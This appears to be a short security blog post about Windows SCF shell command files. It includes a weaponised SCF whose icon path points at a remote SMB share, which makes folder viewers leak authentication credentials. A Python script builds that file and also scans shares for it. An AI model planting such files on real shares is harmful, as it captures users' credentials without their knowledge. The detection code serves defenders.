SMB/HTTP Auth Capture via SCF File

Recently saw a link to an SCF file. Didn't know what those were, so I went digging. Turns out an SCF (Shell Command File) is a simple INI-style text file that tells Windows Explorer which shell command to run and which icon to display for the file. ;-)

Here are the examples I found via the references:

Open Explorer

[Shell]
Command=2
IconFile=explorer.exe,1
[Taskbar]
Command=Explorer

Open “Channels” page in IE:

[Shell]
Command=3
IconFile=shdocvw.dll,-118
[IE]
Command=Channels

This didn’t work for me at all, probably because Internet Explorer doesn’t have “Channels” anymore.

Minimize all windows:

[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop

My first attempt to utilize this file format for fun was of course to just set the IconFile to an SMB share:

[Shell]
Command=2
IconFile=\\192.168.1.101\share\test.ico
[Taskbar]
Command=ToggleDesktop

and that worked as expected: every time the share was opened, whoever opened that folder automatically attempted to authenticate to the share I specified. Lots easier than writing an LNK file.
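As an added example (not the post's own code), here is a small Python script that shows both halves of this: it builds an SCF whose IconFile points at a remote host, exactly like the file above, and it parses SCF files to report any IconFile that Explorer would have to resolve off-host (a UNC path, or, as a conservative extra rule, an http(s) URL). The 192.168.1.101 share is the one from the post; the other host, share and file names, and the sample SCF texts, are made up for the example.

```python
"""Build an SCF with a remote IconFile, and scan SCF files for that pattern.

Added example for this post; not the author's code.  Hosts, shares and
file names other than the post's 192.168.1.101 are constructed.
"""
import configparser
import re
import sys
from pathlib import Path

# A value Explorer would resolve over the network: a UNC path (\\host\share\...)
# or, conservatively, an http(s) URL.  Case-insensitive.  The value is already
# stripped by the parser, so no leading-whitespace handling is needed here.
REMOTE_TARGET = re.compile(r"^(\\\\[^\\\s]+\\|https?://)", re.IGNORECASE)


def build_scf(icon_path: str) -> str:
    """Return SCF text whose IconFile points at icon_path.

    Same layout as the 'minimize all windows' SCF, with the icon redirected.
    Explorer resolves IconFile when it renders the folder holding the file,
    so a UNC icon_path makes the viewer authenticate to that host.
    """
    return (
        "[Shell]\r\n"
        "Command=2\r\n"
        f"IconFile={icon_path}\r\n"
        "[Taskbar]\r\n"
        "Command=ToggleDesktop\r\n"
    )


def parse_scf(text: str) -> dict:
    """Parse SCF text into {section: {key: value}} with lower-cased names.

    SCF is INI-style, so configparser does the work.  interpolation=None keeps
    '%' in paths literal; strict=False tolerates duplicate keys.  Padding such
    as 'Command = 2 ' (seen in the first example above) is stripped.
    """
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(text)
    return {
        section.lower(): {key.lower(): value.strip() for key, value in parser.items(section)}
        for section in parser.sections()
    }


def remote_icon_targets(text: str) -> list:
    """Return the remote locations this SCF would make Explorer fetch an icon from.

    Only [Shell] IconFile is checked, since that is the field Explorer resolves
    on its own.  A local icon such as 'explorer.exe,3' is not reported.
    """
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    return [icon] if REMOTE_TARGET.match(icon) else []


def scan_directory(root: str) -> dict:
    """Map each *.scf under root to its remote icon targets.

    A file configparser cannot parse is recorded as None for manual review.
    """
    results = {}
    for path in Path(root).rglob("*.scf"):
        # SCF files are plain text; skip undecodable bytes rather than crash.
        text = path.read_text(encoding="utf-8", errors="ignore")
        try:
            results[str(path)] = remote_icon_targets(text)
        except configparser.Error:
            results[str(path)] = None
    return results


if __name__ == "__main__":
    # Constructed samples: the benign 'minimize all windows' SCF and a
    # weaponised one pointing at the share from the post.
    BENIGN = (
        "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
        "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
    )
    HOSTILE = build_scf(r"\\192.168.1.101\share\test.ico")
    for name, text in (("benign", BENIGN), ("hostile", HOSTILE)):
        print(f"{name}: {remote_icon_targets(text)}")
    # Optional: scan a directory tree given on the command line.
    if len(sys.argv) > 1:
        for path, targets in scan_directory(sys.argv[1]).items():
            if targets:
                print(f"{path}: icon fetched from {targets}")
            elif targets is None:
                print(f"{path}: unparseable, review by hand")
```

Dropping the output of `build_scf` into a writable share and pointing the UNC at a capture listener reproduces the post's test; running `scan_directory` over the same share afterwards is the matching check for anyone hunting for files like it.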

My gut is telling me there is more to this file format than meets the eye, especially when there are malware writers using it as well. I haven’t been able to get my hands on one to see what they are doing inside the file, but I assume it’s not just to minimize all windows.

There are some hints that you can invoke COM objects... who knows.

References: